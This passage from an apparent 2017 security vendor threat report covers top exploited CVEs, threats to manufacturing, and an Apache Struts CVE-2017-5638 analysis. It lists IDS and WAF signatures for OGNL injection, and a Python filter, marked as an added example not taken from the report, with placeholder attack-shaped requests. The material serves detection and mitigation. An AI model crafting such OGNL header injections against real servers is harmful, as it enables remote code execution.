CVE-2011-3230   3%                 Safari Exploit
CVE-2009-0183   3%                 Free Download Manager

Table 3. Code execution target-campaign event percentage.
The identified CVEs in the top ten can be categorized into three attack methodologies:
• code execution
• data theft
• denial of service (DoS)

[Figure 15: attack method split across the top CVEs: Code Execution 73%, Data Theft 20%, Denial of Service (DoS) 7%]
Figure 15. Attack method visualization according to CVE.

[Figure 16: pie chart, Industries Targeted with Top 10 CVEs: 29% Manufacturing, 26% Finance, 8% Technology, 8% Health Care, 7% Non-Profit, 7% Construction/Real Estate, 6% Retail, 9% Other]
Figure 16. Industries targeted via the top 10 CVEs.

Adobe Flash Exploits
Signatures for CVE-2016-4116 triggered on specific port traffic used to laterally move files. Flash has been, and will for the foreseeable future continue to be, a highly targeted product due to its widespread use across multiple operating systems, and its history of vulnerabilities. In comparison to other Adobe products, Flash accounted for a staggering 98 percent of all Adobe-based vulnerability events. Of that total, the most targeted vulnerability was CVE-2016-4116.

Adobe Product    Event Percentage   CVE Total
Flash Player     98.40%             14
Adobe AIR        1.30%              2
Acrobat Reader   0.10%              5
Air SDK          0.10%              1
Acrobat          0.10%              4

Table 4. Top five Adobe Flash Player vulnerabilities being targeted.

Apache Struts, ShellShock and WannaCry
There is a reason why attackers from each of the top countries consistently target these vulnerabilities. Each can be used to gain access to or remotely control Windows and Linux-based systems. The exception is WannaCry, which utilized the EternalBlue exploit and specifically targets Windows systems. The success of exploiting these vulnerabilities is dependent on the premise that many vendors and administrators have not patched, updated systems or taken additional precautions. Until industry improves the consistency and regularity with which they update systems, such attacks will continue. NTT Security analysts observed the CVEs associated with these now infamous names trending across fifteen industries. The heaviest concentration of this activity was in the manufacturing and finance industries.

Financial institutions can lose millions of dollars as a result of money stolen from accounts, or money paid for ransomware. Manufacturing can lose just as much from theft of product ideas, and intellectual property sold to competitors. All the industries on the list have valuable information to protect.
Global Threat Visibility: Final Thoughts
NTT Security analysts observed a small overall increase in detections in Q2 '17. The first half of 2017 included a heavy focus on manufacturing and the distribution of malware through large phishing campaigns. Web applications based on PHP continue to be a popular target for hackers who understand the lack of security implementations in top plugins and applications. As brute-forcing continues to be popular, NTT Security analyzed several brute-forcing attempts against public MSSQL servers with default ports and out-of-date versions. This should be an important reminder not to allow RDBMS and databases to be public-facing, as attackers focus more on the monetization of ransom-style attacks. As Adobe Flash Player remains riddled with RCE vulnerabilities being targeted by cybercriminals, it is crucial to understand drive-by and web-based attacks continue to be prevalent, targeting not only unpatched servers, but common web visitors in the organization, including the organization's employees and clients. With recent attacks involving a Petya variant, WannaCry, Trickbot and others, NTT Security predicts cybercriminals will continue to support their efforts with phishing campaigns throughout 2017 to deliver ever more robust malware. After analyzing attacks from hosts in several countries, it is evident compromised hosts in countries which typically fly under the radar – such as the Netherlands – are coming back into the spotlight. NTT Security expects this trend to continue as these countries build their infrastructure, which could become compromised and leveraged in future cyberattacks.
NTT Security recommends the following to help mitigate the threats discussed above:
• Conduct regular vulnerability scans and penetration testing to identify vulnerabilities.
• Always take a defense-in-depth (DiD) approach to security controls, including defining internal segmentation and segregation, which increases the complexity for cybercriminals to become more successful during attacks.
• Establish an Incident Response Team supported by formal and documented processes and procedures.
• Enforce effective patch management through both automated and manual processes to ensure necessary software and hardware patches are applied, mitigating successful exploitation attempts.
• Consider whitelisting approved applications.
• Ensure critical data, information, operating systems, applications, tools, and configuration files are backed up and stored offline. Processes and procedures to revert to backups during an incident should be documented and tested on a routine basis.
Attack Profile of the Manufacturing Industry
The cost of cybercrime to businesses is expected to reach $6 trillion annually by 2021 [7]. Globally, the manufacturing industry is now one of the most frequently attacked industries, second only to healthcare, making potential losses in this industry catastrophic.

The manufacturing industry is increasingly being targeted, as threat actors perceive the prospective gains in attacking networks in this industry. Per the National Center for Manufacturing Sciences (NCMS), 33 percent of all cyberattacks in 2015 were against the manufacturing sector. In 2016, 39 percent of manufacturing firms said they’d been breached, with breaches costing between $1-10 million. This trend will certainly continue.

Targeting of the manufacturing industry was also seen in NTT Security client data over the last year. The most recent NTT Security Global Threat Intelligence Report (GTIR) [8] showed the manufacturing industry was heavily targeted across client networks during 2016, appearing in the top three targeted industries in five of the six geographic regions evaluated. No other industry appeared in the top three more than twice. Manufacturing was the most attacked sector in Africa and the Americas, and the second most attacked sector in Asia (32 percent, trailing only finance), so geographic areas with significant manufacturing capabilities are seeing the impact of this focus.

This trend continues into 2017. In fact, the manufacturing industry was the most heavily targeted industry across NTT Security clients during Q2’17.

Global estimates, across all industries, of losses in the trillions of dollars over the next five years are not surprising given the threats industries across the globe face daily, particularly threats to the manufacturing industry, which are becoming progressively more difficult to defend against, as technology and connectivity continue to increase at an astounding rate.

The industry itself covers an incredibly broad range of organizations: fabrics and textiles, food products, construction materials, pharmaceuticals, plastics, metals, computer components, automobiles, just to name a few. The reasons for any given segment to be targeted are innumerable – from intellectual property (IP) theft to espionage to using a firm as a stepping stone for further targeting (for instance, if a targeted manufacturing firm is in the supply chain of another firm or government organization).

What other factors make the manufacturing industry more susceptible to being targeted by hackers, cybercriminals and other threat actors? Is the industry fundamentally more vulnerable?

What Makes Manufacturing an Attractive Target?
Rebecca Taylor, Senior Vice President for NCMS, says, “Most manufacturing systems today were made to be productive – they were not made to be secure. Every manufacturer is at risk – it isn’t a matter of if they will be targeted, it’s a matter of when.”

Intellectual property is at a premium, and in a market where fractions of market shares can mean millions – or billions – of dollars, competition is fierce. Industrial control systems (ICS) are often left unguarded, and worse yet, they are often built with little to no thought for security, sometimes making protection of the device itself impractical. There is a lack of investment in cybersecurity, as funds are being spent upgrading systems to be more productive or more efficient. In fact, almost half of top executives in manufacturing firms neither feel confident in their technology to protect their networks, nor do they feel they have adequate funding.

[7] http://cybersecurityventures.com/cybersecurity-market-report/
[8] https://www.nttsecurity.com/en/what-we-think/gtir-2017/
And, connectivity is increasing. From Internet of Things (IoT) and Operational Technology (OT) devices to robotics to human-machine interfacing (HMI), this connectivity is improving automation, and, subsequently, cutting costs and increasing productivity. Unfortunately, this increases the attack surface. Many industries incorrectly believe “it can’t happen to us. We don’t have vast amounts of consumer data, health records, or credit card information. We just make ‘widgets.’”

While the above line of thought may be the first inclination, remember that, year after year, the manufacturing industry has consistently been one of the top most frequently targeted industries.

Consider the consequences of a breach: fewer ‘widgets’ to sell, competitors gaining insight into your widget production processes or proprietary widget innovations, cybercriminals demanding a ransom to decrypt this same information or foreign nations using this same information to undercut a major bid. This could translate into decreased productivity, increased network downtime, and, ultimately, a decrease in profits. How much decrease in “X” can your organization afford?

There is no question that cybercriminals are looking to capitalize on this highly attackable industry. Others may want to damage a firm’s brand and reputation, perhaps to benefit their own.

But cybercriminals and competitors aren’t alone in targeting those in this industry, as nation-state actors are doing the same.

Per China’s newest Five Year Plan (FYP), the Chinese government continues to prioritize significant efforts within the manufacturing sector through 2020. In early December 2016, China released its newest FYP for intelligent manufacturing in attempts to increase its competitiveness in the “factory of the world,” a long-term strategy to generate new growth in the country’s manufacturing sector.
Additionally, “Made in China 2025” targets ten key segments of the industry for additional government support:
• New energy vehicles
• Next-generation information technology (IT)
• Biotechnology
• New materials
• Aerospace
• Ocean engineering and high-tech ships
• Railway
• Robotics
• Power equipment
• Agricultural machinery

Chinese cyber actors have attacked industries listed in the FYP in the past, primarily to accrue IP and other data. Those segments identified as priorities for research and development can expect continued interest from these actors. Based on experience with attacks from China over the past several years, NTT Security expects these types of attacks to continue in all industries, but particularly in manufacturing.
Trends – and Associated Emerging Risks – in the Manufacturing Industry
In this rapidly changing industry, a top priority is cutting operational costs, while manufacturers leverage technology to ensure future growth.

Manufacturing organizations have taken on a much more widely-distributed environment and infrastructure. Increasing numbers of users and devices will greatly increase the number of avenues into your network from threat actors – from cybercriminals to nation-state actors.

[9] http://www.eweek.com/security/deloitte-survey-finds-manufacturers-highly-vulnerable-to-cyber-threats
[10] https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/609186/Cyber_Security_Breaches_Survey_2017_main_report_
The industry has become more vulnerable due to its focus on technological advances, while not investing as heavily in the cybersecurity budget as in other priorities. This is not to say that the industry is ignoring security, rather that the investment in technology and enabling services has taken priority. As a result, cybersecurity may have taken a back seat. This holds true not only in the manufacturing industry, but in many sectors. In fact, the Cyber Security Breaches Survey 2017 [10], published earlier this year, suggests manufacturers are less likely than many other industries to rate cybersecurity as a serious priority. Just 31 percent of firms in the manufacturing industry regarded cybersecurity as a high priority. In contrast, 61 percent in the financial sector held cybersecurity as a high priority, along with 49 percent in both the healthcare and education sectors. To some extent, this is understandable. Anyone can look at the data and think that “personal healthcare information” and “cardholder data” are more sensitive than “widgets,” right?
Operational Technology and “Smart Factories”
Perhaps the most influential of all trends results in one of the greatest emerging cyber threats to the manufacturing industry: smart factories. Hoping to add efficiency, productivity, quality of products and flexibility to the process, connected – or “smart” – factories are expected to add $500 billion to the global economy in the next five years, adding yet another avenue for threat actors to target the manufacturing industry.

This connectivity is expected to drive a 27 percent increase in efficiency during that timeframe, and by the end of 2022, manufacturers expect that 21 percent [11] of all factories will be fully connected. But all these additional tools, devices, and robots are redefining the attack surface in the manufacturing industry. Despite the benefits of connected devices, this creates an environment with a continually broadening attack landscape due to endpoint expansion. As these devices multiply, they can become crucial access points for an attacker to infiltrate a network, or become pawns in a botnet or even be victims of ransomware themselves. Simply put, the more systems you have, the more likely it is that an attacker is going to find something “interesting” in your environment. [12]

The rise of OT also plays a critical role in integrating manufacturing processes, improving productivity and efficiency, so long as these technologies are properly secured. Integration efforts vary widely by industry segment. For example, 67 percent of industrial manufacturing and 62 percent of aerospace and defense organizations have begun to implement smart factory initiatives, while only 37 percent of pharmaceutical manufacturers are leveraging digital technologies.

Industry 4.0: Automation, Connectivity and Servitization
Manufacturers are amid one of the most exciting technological changes in history, known as the fourth industrial revolution, or Industry 4.0. The capabilities – and challenges – represented by connectivity via IoT and OT, robotics and automation offer manufacturers the opportunity to operate more efficiently and effectively, developing new business processes, such as servitization (essentially, the evolution of an organization's capabilities to better create mutual value through a shift from selling product to selling Product-Service Systems), all taking customer service to a new level.

Although some U.S. manufacturers are moving more slowly in adopting Industry 4.0, 75 percent [13] of respondents in a 2017 report feel they have sufficient understanding of the issues and implications of Industry 4.0 and its threats and opportunities. In addition, a significant proportion of respondents were either beginning to move to Industry 4.0 (23%), or were planning to do so (62%). About 66 percent had made further investments in automation in the past 12 months, and most had acknowledged an understanding of servitization.

New Technologies and Reuse of Old Software
As in many industries, and as noted earlier, manufacturing has historically been geared toward meeting its business objectives rather than a quest for greater security. Another symptom of this mentality is that old software is reused (efficiency!), potentially propagating existing security holes.
[11] http://enterpriseiotinsights.com/20170601/smart-factory/20170601smart-factorysmart-factories-economic-value-tag23
[12] http://enterpriseiotinsights.com/20170601/smart-factory/20170601smart-factorysmart-factories-economic-value-tag23
[13] http://www.nass.org.uk/Publications/Publication4261/Annual-Manufacturing-Report-2017.pdf
In addition, organizations are employing new technologies, potentially exposing firms to risks for which they may not yet have fully considered the impact on their security posture. For example, software may be built using open-source code already in existence on shared sites, possibly including some questionable sources, potentially putting an organization in danger if these hosts aren’t segmented from the rest of the network. While most of this shared code is safe, not all of it is. With hardcoded backdoors written into software, vulnerability proof-of-concepts in insecure software code, and more available online, the risk that an attacker will use this to his advantage increases.

As mentioned at the beginning of this section, new technologies are increasing the attack surface, and properly securing these technologies is essential to reducing the risk to your organization.

Cyber Espionage and Theft of IP
Twenty-one percent of manufacturers have suffered a loss of intellectual property from cyberattacks.

In its 2016 Manufacturing Report, Sikich [14] cited IP theft as the primary motive behind an attack on a manufacturing organization. To further drive the point home, the FBI estimates that IP worth $400 billion is stolen from U.S. firms alone, each year.

Cyber espionage is now considered to be the most common type of attack in this industry. A large part of this is due to the explosion of proprietary data and research.

These types of attacks can take many forms. Most commonly, though, attacks are attributed to competitors trying to obtain IP, whether that IP be proprietary manufacturing processes, patents or designs. Sadly, many international competitors are not highly ethical, viewing cyber espionage as another means to reach their own objectives.

Nation-state actors are heavily immersed in cyber espionage activities, with China dominating the cyber espionage space over the past two decades. Despite the cyber treaty signed in 2015 between the U.S. and China, the threat nevertheless continues, particularly in the manufacturing industry.

Cyber espionage is rampant and is not connected only to nation-state actors. In this global economy, goods can be produced virtually anywhere. If a competitor can steal the research and development behind those goods, then an unethical company, nation or cybercriminal will be able to undercut and win on price. It only costs the unsecured manufacturing firm, and its customers, money.

These attacks by “cyber-spies,” and any subsequent breaches, particularly those backed by nation-states, were behind a significant number of breaches experienced by manufacturing firms last year. These attacks are typically highly targeted and well thought out, targeting specific data. Over 90 percent of the material stolen had been categorized as “secret” or “proprietary,” indicating that the attackers successfully bypassed security controls currently in place, or simply that this is the type of data threat actors are seeking. That said, many state-backed threat actors have access to zero-days or other sophisticated tools. To combat these threats, manufacturers need to ensure they have, at the very least, best practices employed. Please note that these security shortfalls are not specific only to this industry, but seem to happen on a much broader, global scale.

Despite these emerging threats, the 2017 Cybersecurity Breaches Survey suggests that manufacturers are far less likely than many other sectors of the economy to rate cybersecurity as a serious priority for their organizations; it may be worth restating that just 31 percent of manufacturers regarded cybersecurity as a high priority. Hopefully this trend will reverse itself, as the industry faces huge changes in the coming years, requiring the utmost in network security if manufacturing organizations wish to remain competitive.

Recommendations
A paradigm shift in mindset is essential in all segments of the manufacturing industry and in all parts of the process. To successfully face current and future threats, cybersecurity must be built into all aspects of an organization’s networks and operations rather than retrofitted as an afterthought, particularly as Industry 4.0 is implemented. It should be clear that without the proper mitigation efforts in place, all processes are at risk, impacting the bottom line.
[14] https://www.leadingedgealliance.com/thought_leadership/sikich_manufacturing_report_2016r.pdf
An organization greatly decreases the time it takes to bounce back from an attack if the paradigm shift has already occurred. Given the current state of cybersecurity in the manufacturing industry, where defenders are clearly at a disadvantage, attacks may be all but inevitable. With a renewed mindset, organizations in the manufacturing sector can become better equipped and more prepared to react to, and recover from, an attack. This is true for any organization, not just those in the manufacturing industry.

Threat actors and cybercriminals will continue to target victims in two areas: organizations with highly valuable data, and organizations with poor security practices. The manufacturing industry is one of those industries which has historically fallen into both categories. Like any organization, manufacturing organizations can take actions on network/program/software/platform levels to optimize security and reduce the risk of data compromise. If these recommendations can be successfully implemented, the environment can be made more secure in a practical, efficient manner.

NTT Security recommends manufacturing organizations consider the following preventative and mitigation strategies:
• Educate users on identifying and avoiding phishing emails – particularly since employees are the most often targeted, and may be the first – or only – line of defense.
• Ensure computers, network and other internet-connected devices, particularly industrial control systems, are running the most current versions of operating systems and software. Please note that the most current software versions are typically the most secure, but this is not always the case.
• In addition to outside actors, don’t forget to secure against the rogue insider – someone trusted within your organization, who perhaps has “the keys to the kingdom.”
• Enforce “least privilege” – vary the level of individual access, granted based on specific user needs and scenarios.
• To every practical extent, isolate sensitive systems and network functions. Group associated sensitive functions onto protected networks whenever possible, to include segmenting ICS from other network functions.
• Industrial networks are often not well segmented between IT/OT, so an infection in the former can easily spread to the latter.
• Let malware such as WannaCry serve as a recent lesson: although the manufacturing industry seemed almost immune to WannaCry, many Windows machines inside ICS environments are not fully patched, and are often running outdated, unsupported versions.
Threats to Manufacturing: Final Thoughts
The manufacturing industry will continue to mature through automation, servitization and Industry 4.0. NTT Security fully expects attacks in the manufacturing industry to continue. As the implementation of technology increases and attacking becomes more profitable, cybercriminals at all levels will continue to view the industry as incredibly lucrative, vulnerable, and attackable. Securing all facets of your organization is essential. Just one opening creates an opportunity for threat actors to gain, and maintain, a foothold in your network.

Expect IoT, OT and automated devices to continue playing an increasing role as manufacturing organizations consider how to harden their security infrastructure to support Industry 4.0 implementation efforts. Manufacturing organizations must maximize the effectiveness of security controls to protect these technologies as they are implemented.

As the number of endpoint devices increases, the attack surface will also increase, putting further strains on already burdened network infrastructure. This will leave many manufacturing firms striving to find ways to simplify and streamline cybersecurity controls.

Analysts anticipate seeing a blending of attack vectors, as the capability and motivation of threat actors increase and adapt to the ever-changing landscape.

This all means that somehow, manufacturing organizations need to force themselves to prioritize security as part of their evolution. Attackers have identified manufacturing firms as valuable targets, so it becomes incumbent on the industry to make themselves less attractive targets.

References:
http://www.eweek.com/security/deloitte-survey-finds-manufacturers-highly-vulnerable-to-cyber-threats
http://www.themanufacturer.com/reports-whitepapers/annual-manufacturing-report-2017/
http://www.nass.org.uk/Publications/Publication4261/Annual-Manufacturing-Report-2017.pdf
Apache “Struts” its Stuff: A Quick Look into Apache Struts (CVE-2017-5638)

[Figure 18 (diagram, caption below): a Jakarta multipart request passes through StrutsPrepareAndExecuteFilter and MultiPartRequestWrapper to the Commons FileUpload parse/processUpload step; on failure it reaches buildErrorMessage and LocalizedTextUtil, where the message is evaluated by OGNL if it includes an OGNL expression. Struts basic flows for both filters, Jakarta and Jakarta Stream, are similar (orange arrows). Blue arrows: flow of S2-045. White arrow: flow of S2-046.]
Introduction
Petya, WannaCry and the SMB vulnerabilities associated with MS17-010 dominated much of the news over the last half of Q2 ’17, but were by no means the only threats organizations faced. NTT Security GTIC and NTT Computer Emergency Response Team (CERT) collaborated for a closer look at one of those threats, attacks seeking to exploit vulnerabilities in Apache Struts.

There was some buzz around Apache Struts (CVE-2017-5638) after Apache released its security advisories (S2-045 and S2-046) in March 2017. At the time of release, the vulnerabilities, which could allow remote code execution (RCE), were assigned a CVSS of 10, the most critical.

The bigger news about Struts is that attackers quickly jumped on the Struts bandwagon, and have remained there. Apache Struts exploit attempts quickly jumped into the top five attacks most commonly detected in client environments, and have remained in the top seven through June 2017.
Figure 18. Struts attack vector flow
So, no one should really be surprised that attackers are taking advantage of the Struts vulnerabilities – but how bad are they really?

What is a Struts Attack?
The RCE vulnerabilities are based on Struts’ use of Object Graph Navigation Language (OGNL) as a template language. Attackers exploit both S2-045 and S2-046 by crafting a malformed HTTP request, along with an OGNL payload, which forces Struts to create an exception. OGNL includes security restrictions on creating and accessing an object, so attacks must bypass those limitations.

Attack vectors for S2-045 and S2-046 are different, so errors occur in different phases of a process.
• S2-045: HTTP Content-Type header field
• S2-046: HTTP Content-Disposition header field and Content-Length field

The process flow related to each attack vector is shown in Figure 18.
Struts Attacks Timelines
NTT Security researchers and NTT-CERT both tracked the Struts announcement and attacks on a global scale. The timeline in Figure 19 summarizes activity over the first several days. Attackers tend to exploit public vulnerabilities quickly, taking advantage of exploits before security professionals can fully evaluate the vulnerabilities and before patches can be applied. The speed with which Apache Struts attacks (and others) were weaponized helps highlight the importance of effective vulnerability management. Organizations must be able to identify, classify, remediate, mitigate and track vulnerabilities in their environments to minimize the impact new vulnerabilities can have, and to react in an effective manner.
NTT Security and NTT Group resources began investigating Apache Struts within hours of the release of Apache’s security advisory. A researcher released proof-of-concept (PoC) code to exploit the vulnerability on March 8 and web application firewall (WAF) signatures were developed soon after. NTT Security detected what appeared to be malicious attack activity within 24 hours of the release of the PoC code. NTT Security and NTT-CERT analysts evaluated the effectiveness of the Apache patch, as well as WAF signatures in mitigating the impact of the observed attacks.

[Figure 19 (timeline chart, March 7 to March 11, 2017) with these events: Apache releases S2-045; Apache releases patch; Investigation at Apache; Investigation at NTT-CERT; Investigation at JPCERT; Investigation at NTT Security; PoC code released; Additional mitigation defined; WAF and Snort signature release; Applied WAF signatures and mitigation in NTT Group; Applied patch in NTT Group; Monitoring enabled by NTT Security; Attacks detected by NTT Security.]
Figure 19. Struts timeline
In this process, the goal of NTT-CERT’s analysis was to provide current information for internal NTT Group resources, including NTT Security and supporting operating companies. The goal of NTT Security analysis was to provide current information for NTT Security operations and clients. Early on March 9, NTT Security was already detecting significant levels of exploit attempts. As shown in Figure 20, NTT Security detected consistent levels of attacks for several days before the sharp increase in attack traffic on March 17, which is almost completely attributable to activity from China-based sources.
[Figure 21 (chart, caption below): Targeted Industries in U.S. and Japan. Categories: Education, Technology, Finance, Health Care, Government, Retail, Business Services, Entertainment, Energy, Media; two series, U.S. and Japan; y-axis 0% to 50%.]

[Figure 20 (chart): CVE-2017-5638 Changes in Attack Volume. X-axis: Day of Date (March 2017), 3/9 through 3/18; y-axis: 500 to 2500; change labels as extracted: -27%, -46%, 14%, 42%, 44%, 11%, 11%, 102%.]
Figure 20. Struts attack log counts
While attacks originated from many countries around the world, 76 percent of all attacks targeting Apache Struts originated from IP addresses in China.

Observed Attacks
Sixty-nine percent of attacks from China attempted to disable local firewalls and install malware from remote servers using Linux retrieval commands such as wget. This often included attempts to pull down Linux 32-bit and 64-bit malware over POP port 110. Malware names ranged from UpTip60 through UpTip97. This malware was most often hosted in the United States, China or South Korea.

In some instances, wget was used but did not pull down any malicious binary. These were likely attempts to identify vulnerable servers, potentially to retrieve additional binaries for future attacks.

Struts Targets
Researchers specifically evaluated detections in Japan and U.S. operations. There was little overlap in the industries targeted in each region. In the U.S., 65 percent of all Struts detections were identified in the education and healthcare industries, while in Japan, 46 percent of all Struts attacks were reported in the government sector alone. Detections in each industry in the different geographies are shown in Figure 21. The fact that attackers continue to target different industries in different geographic regions should not surprise anyone. While the basics of an Apache Struts attack are similar across all geographies, the motivations of attackers change, as do the targets which attackers in each region find interesting.

Figure 21. Targeted industries in U.S. and Japan

Figure 23. Snort Signatures.
Signature ID    Description
41819           SERVER-APACHE Apache Struts remote code execution attempt
41818           SERVER-APACHE Apache Struts remote code execution attempt
41923           SERVER-APACHE Apache Struts remote code execution attempt
2024038         ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638)
2024044         ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) M2
2024045         ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) M3

Figure 24. F5 BIG IP.
headercontent:"_memberAccess"; nocase; re2:"/\b_memberAccess\b/Hi";
headercontent:"OgnlContext"; nocase;
valuecontent:"OgnlContext"; nocase;
headercontent:"MemberAccess"; nocase;
valuecontent:"MemberAccess"; nocase;

Figure 25. Imperva SecureSphere.
Signature pattern: part="_memberAccess", rgxp="\b_memberAccess\b"; Protocol(s): http,https; Field(s) for search: header
Signature pattern: part="OgnlContext"; Protocol(s): http,https; Field(s) for search: header
Signature pattern: part="OgnlContext"; Protocol(s): http,https; Field(s) for search: parameter
Signature pattern: part="MemberAccess"; Protocol(s): http,https; Field(s) for search: header, parameter
Why Target Struts?
Globally, Struts seems an unlikely target. Apache Struts has relatively low global market adoption when compared to other common web frameworks. Figure 22 [15] shows the relative market share of several web frameworks. However, market share changes when regional impact is considered. A 2013 survey completed in Japan [16] showed that Struts had a 17 percent market share in Japan, which may have helped contribute to elevated levels of attacks in some markets.

NTT Security anticipates cybercriminals will continue targeting Apache Struts installations because of the wide installation base, the simplicity of the attack, and the fact that the attack includes the ability to execute code remotely.
[Figure 22 (chart): Market Share of Common Web Frameworks, % of respondents (0 to 50) per web framework: Spring MVC, Spring Boot, JSF, We don't, Vaadin, Other, GWT, Play 2, Grails, Struts 2, Struts 1, Wicket, Dropwizard, Play 1. Value labels as extracted: 43%, 29%, 17%, 29%, 1%, 5%, 19%, 19%, 17%, 6%, 13%, 13%, 4%, 4%, 3%, 3%, 3%.]
Figure 22. Market share of common web frameworks

[15] https://zeroturnaround.com/rebellabs/java-tools-and-technologies-landscape-2016/
[16] http://www.sbbit.jp/article/cont1/26911 (Please note that this article is only available in Japanese.)
Apache Struts Mitigation
Criminals continue to target Apache Struts installations. To help mitigate these attacks, organizations should consider the following actions:
• Upgrade to Struts versions 2.3.32 or Struts 2.5.10.1 (or later).
• Implement a servlet filter which will validate Content-Type and throw away requests with suspicious values not matching multipart/form-data.
• Change to a different multipart parser such as Pell or the parser from the Commons FileUpload Library [17].
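As an added example (not code from the report, NTT Security or Apache), the Python below implements the two defensive steps described in this section and in "What is a Struts Attack?": scanning the Content-Type and Content-Disposition headers for the OGNL indicators that the Snort/ET, F5 and Imperva signatures above look for, and the strict Content-Type validation the servlet-filter mitigation calls for. The sample requests, the allowlist of simple body types and the 2 MB upload limit are constructed assumptions; the OGNL in the attack-shaped samples is an inert placeholder.

```python
"""Defender-side checks for the CVE-2017-5638 (S2-045 / S2-046) request shapes."""
import re
from typing import List, Tuple

# OGNL expression opener plus the identifiers the report's Snort/ET, F5 and Imperva
# signatures look for; matched case-insensitively, as the signatures do (nocase).
INDICATORS = [
    re.compile(r"%\{|\$\{"),
    re.compile(r"\b_memberAccess\b", re.I),
    re.compile(r"OgnlContext", re.I),
    re.compile(r"MemberAccess", re.I),
]
# S2-045 carried the payload in Content-Type, S2-046 in a multipart part's
# Content-Disposition; both request headers and part headers are scanned.
SUSPECT_HEADERS = ("content-type", "content-disposition")

# Mitigation grammar: well-formed multipart/form-data with an RFC 2046 boundary
# (1-70 boundary characters), or one of the simple body types this app expects.
# The simple-type allowlist and the 2 MB upload limit are constructed assumptions.
MULTIPART_OK = re.compile(
    r"^multipart/form-data\s*;\s*boundary=\"?[0-9A-Za-z'()+_,./:=?-]{1,70}\"?$", re.I)
SIMPLE_OK = re.compile(
    r"^(application/x-www-form-urlencoded|application/json|text/plain)"
    r"(\s*;\s*charset=[\w-]+)?$", re.I)
MAX_UPLOAD_BYTES = 2 * 1024 * 1024


def header_lines(raw: str) -> List[Tuple[str, str]]:
    """(lower-cased name, value) for every header-shaped line, body parts included."""
    out = []
    for line in raw.replace("\r\n", "\n").split("\n"):
        name, sep, value = line.partition(":")
        if sep and re.fullmatch(r"[A-Za-z][A-Za-z0-9-]*", name.strip()):
            out.append((name.strip().lower(), value.strip()))
    return out


def find_indicators(raw: str) -> List[Tuple[str, str]]:
    """(header, matched text) for the first OGNL indicator in each suspect header."""
    hits = []
    for name, value in header_lines(raw):
        if name in SUSPECT_HEADERS:
            for rx in INDICATORS:
                match = rx.search(value)
                if match:
                    hits.append((name, match.group(0)))
                    break
    return hits


def content_type_is_clean(value: str) -> bool:
    """The servlet-filter mitigation: accept only well-formed Content-Type values."""
    return bool(MULTIPART_OK.match(value) or SIMPLE_OK.match(value))


def classify_request(raw: str) -> str:
    """Decide what a front-end filter should do with one raw HTTP request."""
    if find_indicators(raw):
        return "block:ognl-indicator"
    # Only the request's own headers matter from here on: stop at the first blank line.
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    req_headers = dict(header_lines(head))
    ctype = req_headers.get("content-type")
    if ctype is not None and not content_type_is_clean(ctype):
        return "block:unexpected-content-type"
    length = req_headers.get("content-length", "0")
    if length.isdigit() and int(length) > MAX_UPLOAD_BYTES:
        return "block:oversized-upload"
    return "allow"


# Constructed sample requests. The OGNL in the two attack-shaped samples is an inert
# placeholder that only reproduces the header shape the report describes.
S2_045_SHAPE = (
    "POST /upload.action HTTP/1.1\r\nHost: app.example\r\n"
    "Content-Type: %{PLACEHOLDER_OGNL_EXPRESSION}\r\nContent-Length: 0\r\n\r\n"
)
S2_046_SHAPE = (
    "POST /upload.action HTTP/1.1\r\nHost: app.example\r\n"
    "Content-Type: multipart/form-data; boundary=----b\r\nContent-Length: 10000000000\r\n\r\n"
    '------b\r\nContent-Disposition: form-data; name="upload"; filename="%{PLACEHOLDER}"\r\n'
    "Content-Type: text/plain\r\n\r\nx\r\n------b--\r\n"
)
BENIGN_UPLOAD = (
    "POST /upload.action HTTP/1.1\r\nHost: app.example\r\n"
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAbc123\r\n"
    "Content-Length: 183\r\n\r\n------WebKitFormBoundaryAbc123\r\n"
    'Content-Disposition: form-data; name="file"; filename="report.pdf"\r\n'
    "Content-Type: application/pdf\r\n\r\n%PDF-1.4 ...\r\n------WebKitFormBoundaryAbc123--\r\n"
)
UNEXPECTED_TYPE = (
    "POST /upload.action HTTP/1.1\r\nHost: app.example\r\n"
    "Content-Type: application/octet-stream\r\nContent-Length: 4\r\n\r\nabcd"
)

if __name__ == "__main__":
    for sample in (S2_045_SHAPE, S2_046_SHAPE, BENIGN_UPLOAD, UNEXPECTED_TYPE):
        print(classify_request(sample), find_indicators(sample))
```

The indicator scan is what the quoted WAF/IDS signatures do; the grammar check is what the advisory's servlet filter adds, so a request that carries no known indicator but an unexpected Content-Type is still dropped before Struts parses it.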
Struts Signatures and Rules
NTT Group has identified the following signatures and rules (Figures 23, 24 and 25) which may help mitigate attacks. While other detections may be available, NTT Group has identified these signatures and rules as particularly reliable.
Apache Struts: Summary
Attacks against Apache Struts have not reached the same level of attention as WannaCry, Petya, or many other attacks, but attackers have made consistent attempts to exploit the vulnerabilities in Apache Struts since the PoC code was released. Apache Struts has probably not received the level of attention it deserved, given that it has been a “top 7” attack consistently since its release.

As is true with many current vulnerabilities, the single most effective mitigating control is to patch systems in your environment, in this case, Apache Struts. That said, don’t expect Apache Struts attacks to disappear until a lot more organizations have completed that patching.

[17] http://commons.apache.org/proper/commons-fileupload/
Summary
With a 24 percent increase in overall activity, Q2’17 was characterized by a wider blend of attack methods compared to Q4’16. Attacks observed in Q2’17 included a variety of web application attacks, attacks allowing for remote code execution, and phishing-based attacks. Within these phishing campaigns, however, cybercriminals appeared to have a narrower focus, as their preferred vector was leveraging PowerShell commands in VBA macros within malicious attachments.
NTT researchers also noted an uptick in reconnaissance – possibly indicating attack preparation during the upcoming 3rd and 4th quarters. This is a trend NTT Security researchers have observed in previous years, including during Q3 and Q4 ’16, when recon activity declined. There is a strong likelihood that this trend will continue during the last two quarters of 2017 as well, as attackers again shift to more targeted attacks as they determine their targets’ vulnerabilities.

This may not bode well for the manufacturing industry, as a large part of overall reconnaissance activity was aimed at the manufacturing industry during Q2’17, and 33 percent of overall activity against the manufacturing industry was reconnaissance-based. If trends from the past few years continue, this probably indicates that attacks and malware are likely to increase in manufacturing organizations in the second half of 2017.

